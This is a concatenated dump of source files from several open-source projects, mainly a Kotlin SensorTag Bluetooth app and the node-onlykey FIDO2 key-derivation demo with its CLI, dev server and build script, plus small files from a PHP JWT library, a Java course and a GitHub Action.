implementation(libs.coroutines.macosx64)
implementation(libs.stately)
}
}
val macosX64Main by getting {
dependsOn(nativeMain)
}
}
}
android {
compileSdkVersion(libs.versions.android.compile.get())
defaultConfig {
minSdkVersion(libs.versions.android.min.get())
}
buildFeatures {
viewBinding = true
}
lintOptions {
isAbortOnError = false
}
sourceSets {
val main by getting {
manifest.srcFile("src/androidMain/AndroidManifest.xml")
}
}
}
dependencies {
ksp(libs.exercise.compile)
}
// Fix failure when building JavaScript target (with Webpack 5).
// https://youtrack.jetbrains.com/issue/KT-48273
// todo: Remove once Kotlin is upgraded to 1.5.30.
afterEvaluate {
rootProject.extensions.configure<org.jetbrains.kotlin.gradle.targets.js.nodejs.NodeJsRootExtension> {
versions.webpackDevServer.version = "4.0.0"
}
}
<|start_filename|>app/src/androidMain/kotlin/features/scan/ScanViewModel.kt<|end_filename|>
package com.juul.sensortag.features.scan
import android.app.Application
import androidx.lifecycle.AndroidViewModel
import androidx.lifecycle.viewModelScope
import com.juul.kable.Advertisement
import com.juul.kable.Scanner
import com.juul.sensortag.features.scan.ScanStatus.Failed
import com.juul.sensortag.features.scan.ScanStatus.Started
import com.juul.sensortag.features.scan.ScanStatus.Stopped
import kotlinx.coroutines.CancellationException
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.Job
import kotlinx.coroutines.cancelChildren
import kotlinx.coroutines.flow.MutableStateFlow
import kotlinx.coroutines.flow.asStateFlow
import kotlinx.coroutines.flow.catch
import kotlinx.coroutines.flow.collect
import kotlinx.coroutines.flow.filter
import kotlinx.coroutines.flow.onCompletion
import kotlinx.coroutines.launch
import kotlinx.coroutines.withTimeoutOrNull
import java.util.concurrent.TimeUnit
private val SCAN_DURATION_MILLIS = TimeUnit.SECONDS.toMillis(10)
sealed class ScanStatus {
object Stopped : ScanStatus()
object Started : ScanStatus()
data class Failed(val message: CharSequence) : ScanStatus()
}
class ScanViewModel(application: Application) : AndroidViewModel(application) {
private val scanner = Scanner()
private val scanScope = viewModelScope.childScope()
private val found = hashMapOf<String, Advertisement>()
private val _scanStatus = MutableStateFlow<ScanStatus>(Stopped)
val scanStatus = _scanStatus.asStateFlow()
private val _advertisements = MutableStateFlow<List<Advertisement>>(emptyList())
val advertisements = _advertisements.asStateFlow()
fun startScan() {
if (_scanStatus.value == Started) return // Scan already in progress.
_scanStatus.value = Started
scanScope.launch {
withTimeoutOrNull(SCAN_DURATION_MILLIS) {
scanner
.advertisements
.catch { cause -> _scanStatus.value = Failed(cause.message ?: "Unknown error") }
.onCompletion { cause -> if (cause == null) _scanStatus.value = Stopped }
.filter { it.isSensorTag }
.collect { advertisement ->
found[advertisement.address] = advertisement
_advertisements.value = found.values.toList()
}
}
}
}
fun stopScan() {
scanScope.cancelChildren()
}
}
private val Advertisement.isSensorTag
get() = name?.startsWith("SensorTag") == true ||
name?.startsWith("CC2650 SensorTag") == true
private fun CoroutineScope.childScope() =
CoroutineScope(coroutineContext + Job(coroutineContext[Job]))
private fun CoroutineScope.cancelChildren(
cause: CancellationException? = null
) = coroutineContext[Job]?.cancelChildren(cause)
<|start_filename|>app/src/androidMain/kotlin/SeekBar.kt<|end_filename|>
package com.juul.sensortag
import android.widget.SeekBar
fun SeekBar.onStopTracking(action: SeekBar.() -> Unit) {
val listener = object : SeekBar.OnSeekBarChangeListener {
override fun onStartTrackingTouch(seekBar: SeekBar) {}
override fun onProgressChanged(seekBar: SeekBar, progress: Int, fromUser: Boolean) {}
override fun onStopTrackingTouch(seekBar: SeekBar) {
action.invoke(seekBar)
}
}
setOnSeekBarChangeListener(listener)
}
<|start_filename|>app/src/jsMain/kotlin/Script.kt<|end_filename|>
package com.juul.sensortag
import com.juul.kable.Options
import com.juul.kable.Options.Filter.NamePrefix
import com.juul.kable.State.Disconnected
import com.juul.kable.requestPeripheral
import com.juul.tuulbox.logging.ConsoleLogger
import com.juul.tuulbox.logging.ConstantTagGenerator
import com.juul.tuulbox.logging.Log
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.Job
import kotlinx.coroutines.await
import kotlinx.coroutines.coroutineScope
import kotlinx.coroutines.delay
import kotlinx.coroutines.flow.collect
import kotlinx.coroutines.flow.launchIn
import kotlinx.coroutines.flow.onEach
import kotlinx.coroutines.launch
typealias MessageListener = (message: String) -> Unit
typealias MovementListener = (x: Float, y: Float, z: Float) -> Unit
private fun canonicalUuid(uuid: String): String = when (uuid.length) {
4 -> "0000$uuid-0000-1000-8000-00805f9b34fb"
else -> error("Canonical UUID length must be 4, was ${uuid.length}")
}
private const val movementSensorServiceUuid = "f000aa80-0451-4000-b000-000000000000"
private const val movementSensorDataUuid = "f000aa81-0451-4000-b000-000000000000"
private const val movementNotificationUuid = "f0002902-0451-4000-b000-000000000000"
private const val movementConfigurationUuid = "f000aa82-0451-4000-b000-000000000000"
private const val movementPeriodUuid = "f000aa83-0451-4000-b000-000000000000"
private val clientCharacteristicConfigUuid = canonicalUuid("2902")
class Script {
init {
Log.tagGenerator = ConstantTagGenerator(tag = "SensorTag")
Log.dispatcher.install(ConsoleLogger)
}
private val scope = CoroutineScope(Job())
private val options = Options(
optionalServices = arrayOf(
movementSensorServiceUuid,
movementSensorDataUuid,
movementNotificationUuid,
movementConfigurationUuid,
movementPeriodUuid,
clientCharacteristicConfigUuid,
),
filters = arrayOf(
NamePrefix("SensorTag"),
NamePrefix("CC2650 SensorTag"),
)
)
private val statusListeners = mutableListOf<MessageListener>()
@JsName("addStatusListener")
fun addStatusListener(listener: MessageListener) {
statusListeners += listener
}
@JsName("removeStatusListener")
fun removeStatusListener(listener: MessageListener) {
statusListeners -= listener
}
private fun emitStatus(status: String) {
Log.verbose { status }
statusListeners.forEach { it.invoke(status) }
}
private val movementListeners = mutableListOf<MovementListener>()
@JsName("addMovementListener")
fun addMovementListener(listener: MovementListener) {
movementListeners += listener
}
@JsName("removeMovementListener")
fun removeMovementListener(listener: MovementListener) {
movementListeners -= listener
}
private fun emitMovement(movement: Vector3f) {
val (x, y, z) = movement
movementListeners.forEach { it.invoke(x, y, z) }
}
private var connection: Job? = null
@JsName("connect")
fun connect(): Unit {
disconnect() // Clean up previous connection, if any.
connection = scope.launch {
val sensorTag = SensorTag(requestPeripheral(options).await())
sensorTag.establishConnection()
enableAutoReconnect(sensorTag)
try {
sensorTag.gyro.collect(::emitMovement)
} finally {
sensorTag.disconnect()
}
}.apply {
invokeOnCompletion { cause ->
Log.info { "invokeOnCompletion $cause" }
emitStatus("Disconnected")
}
}
}
@JsName("disconnect")
fun disconnect() {
connection?.cancel()
connection = null
}
private suspend fun SensorTag.establishConnection(): Unit = coroutineScope {
emitStatus("Connecting")
connect()
enableGyro()
emitStatus("Connected")
}
private fun CoroutineScope.enableAutoReconnect(
sensorTag: SensorTag
) = sensorTag.state.onEach { state ->
Log.info { "State: ${state::class.simpleName}" }
if (state is Disconnected) {
Log.info { "Waiting 5 seconds to reconnect..." }
delay(5_000L)
sensorTag.establishConnection()
}
}.launchIn(this)
}
<|start_filename|>app/src/androidMain/kotlin/App.kt<|end_filename|>
package com.juul.sensortag
import android.app.Application
import com.juul.tuulbox.logging.ConsoleLogger
import com.juul.tuulbox.logging.Log
class App : Application() {
override fun onCreate() {
super.onCreate()
Log.dispatcher.install(ConsoleLogger)
}
}
<|start_filename|>app/src/androidMain/kotlin/features/scan/ScanAdapter.kt<|end_filename|>
package com.juul.sensortag.features.scan
import android.view.LayoutInflater
import android.view.ViewGroup
import androidx.recyclerview.widget.DiffUtil
import androidx.recyclerview.widget.RecyclerView
import com.juul.sensortag.databinding.ScanItemBinding
import com.juul.kable.Advertisement
import java.lang.Long.parseLong
class ScanAdapter(
private val listener: (Advertisement) -> Unit
) : RecyclerView.Adapter<ScanItemViewBinder>() {
private val advertisements = mutableListOf<Advertisement>()
fun update(newList: List<Advertisement>) {
if (newList.isEmpty()) {
advertisements.clear()
notifyDataSetChanged()
} else {
val result = DiffUtil.calculateDiff(DiffCallback(advertisements, newList), false)
advertisements.clear()
advertisements.addAll(newList)
result.dispatchUpdatesTo(this)
}
}
override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): ScanItemViewBinder {
val binding = ScanItemBinding.inflate(LayoutInflater.from(parent.context), parent, false)
return ScanItemViewBinder(binding)
}
override fun onBindViewHolder(binder: ScanItemViewBinder, position: Int) =
binder.bind(advertisements[position], listener)
override fun getItemCount(): Int = advertisements.size
override fun getItemId(position: Int): Long = advertisements[position].id
}
class ScanItemViewBinder(
private val binding: ScanItemBinding
) : RecyclerView.ViewHolder(binding.root) {
fun bind(
advertisement: Advertisement,
listener: (Advertisement) -> Unit
) = with(binding) {
deviceName.text = advertisement.name ?: "<unknown>"
macAddress.text = advertisement.address
rssi.text = "${advertisement.rssi} dBm"
root.setOnClickListener { listener.invoke(advertisement) }
}
}
private val Advertisement.id: Long
get() {
require(address.isNotBlank())
return parseLong(address.replace(":", ""), 16)
}
<|start_filename|>build.gradle.kts<|end_filename|>
buildscript {
repositories {
google()
mavenCentral()
}
}
plugins {
alias(libs.plugins.kotlin.multiplatform) apply false
alias(libs.plugins.ksp) apply false
alias(libs.plugins.android.application) apply false
alias(libs.plugins.java8)
}
subprojects {
repositories {
mavenLocal()
google()
mavenCentral()
maven("https://oss.sonatype.org/content/repositories/snapshots")
}
}
| JuulLabs/sensortag |
<|start_filename|>docs/nodejs/index.js<|end_filename|>
var { FIDO2Client } = require("@vincss-public-projects/fido2-client");
var fido2 = new FIDO2Client();
// fido2.on("fido2-enter-pin", function(a,b,c){
// console.log("set pin");
// // fido2.emit("fido2-enter-pin-replay","0420");
// fido2.reply("0420");
// });
var EventEmitter = require("events").EventEmitter;
var $window = new EventEmitter();
// $window.crypto = require("node-webcrypto-shim");
const WebCrypto = require('node-webcrypto-ossl');
const webcrypto = new WebCrypto({
// directory: `${process.env.HOME}/.webcrypto/keys`
});
$window.crypto = webcrypto;
$window.atob = require("atob");
$window.btoa = require("btoa");
$window.location = {
hostname: "grid.peersocial.io" //set to your domain
};
$window.navigator = {
vendor: "NODE",
userAgent: "NODE",
platform: "Linux",
credentials: {
get: function(ticket) {
return fido2.getAssertion(ticket, "https://" + $window.location.hostname)
}
}
};
global.window = $window;
var ONLYKEY = require("../../src/onlykey-api.js");
console.log(ONLYKEY)
var bob = {"pub":"<KEY>","priv":"<KEY>","epub":"<KEY>","epriv":"<KEY>"};
var press_required = false;
ONLYKEY.connect(async function() {
var keyType = 1; //P256R1
ONLYKEY.derive_public_key("Onlykey Rocks!", keyType, press_required, async function(err, key) {
ONLYKEY.derive_shared_secret("Onlykey Rocks!", bob.epub, keyType, press_required, async function(err, sharedSecret) {
console.log("key:", key)
console.log("sharedSecret:", sharedSecret)
});
});
});
<|start_filename|>src/cli.js<|end_filename|>
#!/usr/bin/env node
// module.exports = function(callback) {
var args = require('minimist')(process.argv.slice(2), {
// '--': true,
boolean: [
"keypress",
// "serial",
"help"
],
alias: {
keytype: "t",
keypress: "p",
help: ["h","?"]
},
default: {
seed:"Onlykey Rocks!",
keytype: 1,
keypress: false,
domain:'localhost',
// serial: false,
help: false
}
});
if(args.help){
console.log("--help,-h,-? shows this");
// console.log("--serial developer firmware serial");
console.log("--keypress,-p use touch key");
console.log("--keytype=1,-t=1 1=P256R1,3=CURVE25519");
console.log("--seed='Onlykey Rocks!' seed for aditional_data");
console.log("--secret='pubkey' pubkey to generate a secret from seed");
console.log("--domain='localhost' domain to generate keys for");
return;
}
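// Example invocations (illustrative only; flag names come from the help text above):
// $ node src/cli.js --seed='Onlykey Rocks!' --keytype=1 --domain='localhost'
// $ node src/cli.js --seed='Onlykey Rocks!' --keytype=3 --keypress --secret='<recipient pubkey>' --domain='example.com'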
// if (args.serial) {
// require("./serial.js");
// return;
// }
if(!process.env.DOMAIN && args.domain)
process.env.DOMAIN = args.domain;
var plugins = [];
plugins.push(require("./window.js")); //load replacement onlykey need for plugin
plugins.push(require("./onlykey-fido2/plugin.js")); //load onlykey plugin for testing
plugins.push(require("./console/console.js")); //load replacement onlykey need for plugin
var EventEmitter = require("events").EventEmitter;
var architect = require("../libs/architect.js");
plugins.push({
provides: ["app"],
consumes: ["hub"],
setup: function(options, imports, register) {
register(null, {
app: new EventEmitter()
});
}
});
architect.createApp(plugins, function(err, app) {
if (err) return console.error(err);
app.services.app.core = app.services;
for (var i in app.services) {
app.services.app[i] = app.services[i];
}
for (var i in app.services) {
if (app.services[i].init) app.services[i].init(app);
}
// app.services.app.emit("start");
// callback(null, app);
var ONLYKEY = app.services.onlykey3rd(args.keytype);
// ONLYKEY.connect(console.log)
if (!args.secret) {
ONLYKEY.derive_public_key(args.seed, args.keytype, args.keypress, async function(err, key) {
console.log(JSON.stringify({domain: process.env.DOMAIN, seed: args.seed, epub:key }))
});
}
else {
ONLYKEY.derive_shared_secret(args.seed, args.secret, args.keytype, args.keypress, async function(err, sharedSecret, seedKey) {
console.log(JSON.stringify({domain: process.env.DOMAIN, seed: args.seed, epub:seedKey, pub: args.secret, sharedSecret: sharedSecret }))
});
}
});
// }
<|start_filename|>docs/server.js<|end_filename|>
var express = require("express");
var app = express();
var http = require('http');
var https = require('https');
var fs = require('fs');
var server;
if(!process.env.PORT){
process.env.PORT = 3000;
var cert;
try{
server = https.createServer({
key: fs.readFileSync('_._server.key'),
cert: cert = fs.readFileSync('_._server.cert')
}, app);
}catch(e){}
if(!cert){
console.log("need to run this command in terminal in project dir", __dirname);
console.log("' $ openssl req -nodes -new -x509 -keyout _._server.key -out _._server.cert '");
server = http.createServer(app);
}
}else{
server = http.createServer(app);
}
app.use("/dist", express.static(__dirname + "/../dist"));
app.use(express.static(__dirname));
// app.use("/libs", express.static(__dirname + "/../libs"));
process.env.PORT = process.env.PORT || 3000;
server.listen(process.env.PORT, () => {
console.log('listening on *:' + process.env.PORT);
});
<|start_filename|>docs/index.html<|end_filename|>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>node-onlykey demonstration</title>
<link href="./libs/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
padding-top: 5rem;
}
</style>
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark bg-dark fixed-top">
<a class="navbar-brand" href="./">node-onlykey demonstration</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="navbar-collapse collapse justify-content-between" id="navbarNavDropdown">
<ul class="navbar-nav mr-auto" id="navbar-nav-left">
</ul>
<ul class="navbar-nav" id="navbar-nav-right">
</ul>
</div>
</nav>
<main role="main" class="container-fluid" id="main-container">
<h2>Welcome to Onlykey's 3rd Party demonstration.</h2><hr/>
Here we show you how to encrypt and decrypt using shared keys.<br/>
For shared key cryptography to work, the sender and the recipient of a message must both have the same key, which they must keep secret from everybody else.<br/>
The sender uses the shared key to encrypt a message, and then sends the ciphertext message to the recipient.<br/>
When the ciphertext message arrives, the recipient uses the identical shared key to decrypt the message.
<br/>
<hr/>
With Onlykey, we offer two key types (P256R1 and CURVE25519) that can generate shared secret keys: first a unique public key is generated and sent to the other party, and a unique public key is received from the recipient in return.<br/>
It's important to understand that all keys generated with Onlykey are unique per domain in combination with Additional Data.<br/>
Additional Data changes the public and private keys, allowing an unlimited number of keys to generate shared secrets per domain.<br/>
Generating keys with identical Additional Data on a different domain will result in a different key.
<hr/>
In addition to generating keys, there is an optional physical key-press interaction that secures shared keys against rogue access.<br/>
This allows developers to ensure secure access in special scenarios.
<hr/>
Onlykey's key generation is transparent: keys are not marked as having been generated by Onlykey. This allows anonymity, hiding from other users where a key is generated or stored.
<hr/>
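<!--
Illustrative sketch (not rendered): the shared-secret flow described above, using the same calls the
demo wires up in ./index.js; treat the names as assumptions drawn from that file.
onlykey.derive_shared_secret(additionalData, theirPublicKey, keyType, pressRequired, async function(err, sharedSecret) {
var ciphertext = await GUN.SEA.encrypt("hello", sharedSecret); // sender encrypts
var plaintext = await GUN.SEA.decrypt(ciphertext, sharedSecret); // recipient decrypts with the same secret
});
-->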
<!--<a id="NACL.js" href="javascript:void(0);" class="btn btn-primary startTestType">nacl.js</a><br/><br/>-->
<div>
<h3>P256R1</h3>
<div class="d-flex justify-content-center">
<div><a id="P256R1" href="javascript:void(0);" class="btn btn-primary startTestType">P256R1</a> <a id="P256R1-enc" href="javascript:void(0);" class="btn btn-primary startTestType">P256R1 (REQ_PRESS)</a></div>
</div>
</div>
<hr/>
<div>
<h3>CURVE25519</h3>
<div class="d-flex justify-content-center">
<div><a id="CURVE25519" href="javascript:void(0);" class="btn btn-primary startTestType">CURVE25519</a> <a id="CURVE25519-enc" href="javascript:void(0);" class="btn btn-primary startTestType">CURVE25519 (REQ_PRESS)</a><br/><br/></div>
</div>
</div>
<hr/>
Source and Documentation: <a href="https://github.com/trustcrypto/node-onlykey">https://github.com/trustcrypto/node-onlykey</a>
<br/>
Report and issue here: <a href="https://github.com/trustcrypto/node-onlykey/issues">https://github.com/trustcrypto/node-onlykey/issues</a>
<br/>
<div class="col-sm text-center"><a href="https://crp.to/">CryptoTrust LLC</a> © 2022</div>
</main>
<script src="./libs/jquery.js"></script>
<script src="./libs/gun.min.js"></script>
<script src="./libs/sea.js"></script>
<script src="./libs/bootstrap/js/bootstrap.bundle.js"></script>
<script data-main="./libs/setup" src="./libs/require.js"></script>
<script>
$(".startTestType").click(function(){
var _this = this;
require(["./index.js"], function(index) {
index.start(_this.id)
});
})
</script>
</body>
</html>
<|start_filename|>docs/index.js<|end_filename|>
define(function(require, exports, module) {
/* globals $ SEA GUN */
function hex_encode(byteArray) {
return Array.prototype.map.call(byteArray, function(byte) {
return ('0' + (byte & 0xFF).toString(16)).slice(-2);
}).join('');
}
function hex_decode(hexString) {
var result = [];
for (var i = 0; i < hexString.length; i += 2) {
result.push(parseInt(hexString.substr(i, 2), 16));
}
return Uint8Array.from(result);
}
module.exports = {
start: function(testType) {
var bs_modal_dialog = {
confirm: function(title, question, answers, done) {
var m = $(
`<div class="modal" tabindex="-1" role="dialog">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title"></h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body"></div>
<div class="modal-footer"></div>
</div>
</div>
</div>`);
m.find(".modal-title").text(title);
m.find(".modal-body").html(question);
for (var i in answers) {
((ans) => {
var b = $(`<button type="button" class="btn btn-primary">${ans}</button>`);
b.click(function() {
m.modal("hide");
done(null, ans);
});
m.find(".modal-footer").append(b);
})(answers[i]);
}
var cancel = $(`<button type="button" class="btn btn-secondary">Cancel</button>`);
cancel.click(function() {
m.modal("hide");
done(true);
});
m.find(".modal-footer").append(cancel);
m.on("hidden.bs.modal", function() {
m.modal("dispose");
m.remove();
});
m.appendTo("body");
m.modal('show');
return m;
}
}
console.log("onlykeyIndex");
require("./dist/onlykey3rd-party.js")(function(ONLYKEY) {
var onlykey;
var pageLayout;
var keyType;
var press_required = (testType.split("-")[1] ? true : false);
if (testType.split("-")[0] == "P256R1") {
keyType = 1; //P256R1
onlykey = ONLYKEY(keyType);
pageLayout = $(require("text!./pageLayout_P256R1.html"));
onlykey.on("status", function() {
var args = [];
for (var i = 0; i < arguments.length; i++) {
args.push(arguments[i]);
}
var s = args.join(" ");
$("#console_output").append($("<span/>").text(s));
$("#console_output").append($("<br/>"));
$("#connection_status").text(s);
});
pageLayout.find("#connect_onlykey").click(function() {
onlykey.connect(async function() {
console.log("onlykey has connected");
pageLayout.find("#connect_onlykey").hide();
pageLayout.find("#connected_onlykey").show();
// pageLayout.find("#derive_public_key").click();
}, async function(status) {
pageLayout.find("#connection_status").text(status);
});
});
pageLayout.find("#derive_public_key").click(function() {
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_public_key(AdditionalData, keyType, press_required, async function(err, ok_jwk_epub) {
if (err) console.log(err);
pageLayout.find("#onlykey_pubkey").val(ok_jwk_epub);
if ($("#encryptKey").val() == "")
$("#encryptKey").val(ok_jwk_epub);
if ($("#decryptKey").val() == "")
$("#decryptKey").val(ok_jwk_epub);
pageLayout.find("#encryptData").val("test");
//$("#encryptBTN").click();
});
});
pageLayout.find("#connect_onlykey").click();
$("#main-container").html(pageLayout);
$("#encryptBTN").click(async function() {
var encData = pageLayout.find("#encryptData").val();
var input_jwk_epub = pageLayout.find("#encryptKey").val(); //.split("")
//onlykey.b642bytes()
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, input_jwk_epub, keyType, press_required, async function(err, sharedSecret, ok_jwk_epub) {
if (err) console.log(err);
var enc = await GUN.SEA.encrypt(encData, sharedSecret);
//pageLayout.find("#encryptData").val(enc);
pageLayout.find("#decryptData").val(enc);
pageLayout.find("#pills-decrypt-tab").click();
});
});
$("#decryptBTN").click(async function() {
var decData = pageLayout.find("#decryptData").val();
var input_jwk_epub = pageLayout.find("#decryptKey").val();
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, input_jwk_epub, keyType, press_required, async function(err, sharedSecret, ok_jwk_epub) {
if (err) console.log(err);
//var enc = await SEA.encrypt('shared data', await SEA.secret(bob.epub, alice));
var dec = await GUN.SEA.decrypt(decData, sharedSecret);
pageLayout.find("#encryptData").val(dec);
pageLayout.find("#pills-encrypt-tab").click();
});
});
$("#derive_shared_secrets").click(async function() {
(async function() {
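// Ask the OnlyKey to derive a shared secret against the SEA test key's epub, then compute the counterpart locally with SEA.secret so the two values can be compared.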
// var key = pageLayout.find("#onlykey_pubkey").val();
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, JSON.parse($("#sea_test_key").val()).epub, keyType, press_required, async function(err, sharedSecret, ok_jwk_epub) {
if (err) console.log(err);
$("#ok_test_shared_secret").val(sharedSecret);
pageLayout.find("#onlykey_pubkey").val(ok_jwk_epub);
if ($("#encryptKey").val() == "")
$("#encryptKey").val(ok_jwk_epub);
if ($("#decryptKey").val() == "")
$("#decryptKey").val(ok_jwk_epub);
var testSharedSecret = await SEA.secret({
epub: ok_jwk_epub
}, JSON.parse($("#sea_test_key").val()));
$("#sea_test_shared_secret").val(testSharedSecret);
});
})();
});
// (async function() {
// $("#sea_test_key").text(JSON.stringify(await GUN.SEA.pair()))
// })()
}
/*
if (testType == "NACL.js") {
require("./test_nacl.js").start(testType)
}*/
if (testType.split("-")[0] == "CURVE25519") {
keyType = 3; //CURVE25519
onlykey = ONLYKEY(keyType);
pageLayout = $(require("text!./pageLayout_CURVE25519.html"));
onlykey.on("status", function() {
var args = [];
for (var i = 0; i < arguments.length; i++) {
args.push(arguments[i]);
}
var s = args.join(" ");
$("#console_output").append($("<span/>").text(s));
$("#console_output").append($("<br/>"));
$("#connection_status").text(s);
});
pageLayout.find("#connect_onlykey").click(function() {
onlykey.connect(async function() {
console.log("onlykey has connected");
pageLayout.find("#connect_onlykey").hide();
pageLayout.find("#connected_onlykey").show();
// pageLayout.find("#derive_public_key").click();
}, async function(status) {
pageLayout.find("#connection_status").text(status);
});
});
pageLayout.find("#derive_public_key").click(function() {
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_public_key(AdditionalData, keyType, press_required, async function(err, OK_sharedPubKey, keyString) {
if (err) console.log(err);
pageLayout.find("#onlykey_pubkey").val(OK_sharedPubKey);
if ($("#encryptKey").val() == "")
$("#encryptKey").val(OK_sharedPubKey);
if ($("#decryptKey").val() == "")
$("#decryptKey").val(OK_sharedPubKey);
pageLayout.find("#encryptData").val("test");
//$("#encryptBTN").click();
});
});
pageLayout.find("#connect_onlykey").click();
$("#main-container").html(pageLayout);
$("#encryptBTN").click(async function() {
var encData = pageLayout.find("#encryptData").val();
var encryptoToKey = pageLayout.find("#encryptKey").val(); //.split("")
//onlykey.b642bytes()
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, encryptoToKey, keyType, press_required, async function(err, sharedSecret) {
if (err) console.log(err);
var enc = await GUN.SEA.encrypt(encData, sharedSecret);
//pageLayout.find("#encryptData").val(enc);
pageLayout.find("#decryptData").val(enc);
pageLayout.find("#pills-decrypt-tab").click();
});
});
$("#decryptBTN").click(async function() {
var decData = pageLayout.find("#decryptData").val();
var decryptoToKey = pageLayout.find("#decryptKey").val();
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, decryptoToKey, keyType, press_required, async function(err, sharedSecret) {
if (err) console.log(err);
//var enc = await SEA.encrypt('shared data', await SEA.secret(bob.epub, alice));
var dec = await GUN.SEA.decrypt(decData, sharedSecret);
pageLayout.find("#encryptData").val(dec);
pageLayout.find("#pills-encrypt-tab").click();
});
});
$("#derive_shared_secrets").click(async function() {
var AdditionalData = $("#onlykey_additional_data").val();
var OK_sharedPubKey = $("#onlykey_pubkey").val();
(async function() {
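// Compute the X25519 shared secret locally from Bob's test key pair (nacl.scalarMult + build_AESGCM), then have the OnlyKey derive the same secret from Bob's public key so both values can be compared.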
var ok_pubkey_decoded = onlykey.decode_key(OK_sharedPubKey);
var pair_bob = JSON.parse($("#sea_test_key").val());
var bobPubKey = pair_bob.epub; //<-- hex encoded
var bobPrivKey = pair_bob.epriv; //<-- hex encoded
var bobPubKey_decoded = onlykey.decode_key(bobPubKey); //<-- uint8array
var bobPrivKey_decoded = onlykey.decode_key(bobPrivKey); //<-- uint8array
console.log("bob1", onlykey.encode_key(bobPubKey_decoded));
console.log("bob2", onlykey.encode_key(bobPrivKey_decoded));
console.log("bobs_pair", pair_bob);
var nacl = require("nacl");
//nacl.scalarMult(bob priv key, sharedPub)
var ss = nacl.scalarMult(bobPrivKey_decoded, ok_pubkey_decoded);
// var ss = nacl.box.before(hex_decode(OK_sharedPubKey), bobPrivKey_decoded);
// await onlykey.build_AESGCM(ss)
var Bob_generated_sharedSecret = await onlykey.build_AESGCM(ss); //hex_encode(ss);
console.log("nacl:x25519 Bob_generated_sharedSecret", Bob_generated_sharedSecret);
$("#sea_test_shared_secret").val(Bob_generated_sharedSecret);
onlykey.derive_shared_secret(AdditionalData, bobPubKey, keyType, press_required, async function(err, sharedSecret) {
if (err) console.log(err);
$("#ok_test_shared_secret").val(sharedSecret);
console.log("elliptic_curve25519: bobPubKey: ", bobPubKey);
console.log("elliptic_curve25519: Bob_generated_sharedSecret: ", Bob_generated_sharedSecret);
});
})();
});
// (async function() {
// $("#sea_test_key").text(JSON.stringify(await GUN.SEA.pair()))
// })()
}
}, function(proceed, browser) {
if (browser == "Apple")
bs_modal_dialog.confirm("Continue",
`To continue, please click 'Yes' to access OnlyKey via USB`, ["Yes"],
async function(cancel, ans) {
if (ans == "Yes") {
proceed();
}
});
else proceed();
});
}
};
})
<|start_filename|>src/onlykey-fido2/package.json<|end_filename|>
{
"name": "onlykey-fido2",
"version": "1.0.0",
"description": "",
"main": "index.html",
"scripts": {
"serial": "node ./serial.js"
},
"repository": {
"type": "git",
"url": "git+https://github.com/trustcrypto/node-onlykey.git"
},
"author": "",
"license": "ISC",
"bugs": {
"url": "https://github.com/trustcrypto/node-onlykey/issues"
},
"homepage": "https://github.com/trustcrypto/node-onlykey#readme",
"dependencies": {
"@vincss-public-projects/fido2-client": "git+https://github.com/trustcrypto/FIDO2Client.git",
"atob": "^2.1.2",
"btoa": "^1.2.1",
"file-saver": "^2.0.2",
"jszip": "^3.5.0",
"node-forge": "^0.10.0",
"node-webcrypto-shim": "0.0.1",
"optimist": "^0.6.1",
"tweetnacl": "^1.0.3"
}
}
<|start_filename|>build.node-onlykey-cli.js<|end_filename|>
var nexe = require('nexe');
var compile = nexe.compile;
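// Bundle ./src/cli.js into a standalone 64-bit Windows executable (Node 12.18.2) using nexe.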
compile({
target: "windows-x64-12.18.2",
input: './src/cli.js',
output: './node-onlykey.exe',
temp: "./.tmp-nexe",
loglevel:"verbose"
}).then(() => {
console.log('done: success')
}) | gitter-badger/node-onlykey |
<|start_filename|>composer.json<|end_filename|>
{
"authors": [
{
"name": "<NAME>",
"email": "<EMAIL>"
}
],
"autoload": {
"psr-4": {
"Jweety\\": "src/"
}
},
"autoload-dev": {
"psr-4": {
"Jweety\\": "tests/"
}
},
"config": {
"sort-packages": true
},
"description": "Simple JWT (RFC 7519) encoding/decoding and validation library, for PHP >= 5.3.",
"homepage": "http://vaibhavpandeyvpz.github.io/jweety",
"keywords": ["jwt", "json web token", "authentication"],
"license": "MIT",
"name": "vaibhavpandeyvpz/jweety",
"require": {
"php": "^5.3||^7.0"
},
"require-dev": {
"phpunit/phpunit": "^5.0||^6.0"
},
"suggest": {
"symfony/polyfill-php56": "For using hash_equals(...) on ancient PHP versions."
},
"type": "library"
}
| vaibhavpandeyvpz/jweety |
<|start_filename|>1-0-java-basics/1-5-0-hello-annotations/src/main/java/com/bobocode/basics/Level.java<|end_filename|>
package com.bobocode.basics;
/**
* Enum that lists all possible exercise complexity levels.
*/
public enum Level {
BEGINNER, BASIC, ADVANCED, CRAZY
}
| zav0dila/java-fundamentals-course |
<|start_filename|>src/index.js<|end_filename|>
const core = require('@actions/core');
const path = require('path');
const { Installer } = require('./installer');
(async () => {
const installer =
new Installer(core.getInput('version'), path.join(__dirname, '../src'));
try {
await installer.install();
} catch (e) {
core.setFailed(e.message);
}
})();
<|start_filename|>.vscode/settings.json<|end_filename|>
{
"editor.codeActionsOnSave": {
"source.fixAll": true,
"fixAll.eslint": true,
"source.organizeImports": true,
"typescript.suggestionActions.enabled": true
},
"cSpell.words": [
"UNSECURE",
"appium",
"autobuild",
"briandk",
"cobc",
"codeql",
"gnucobol",
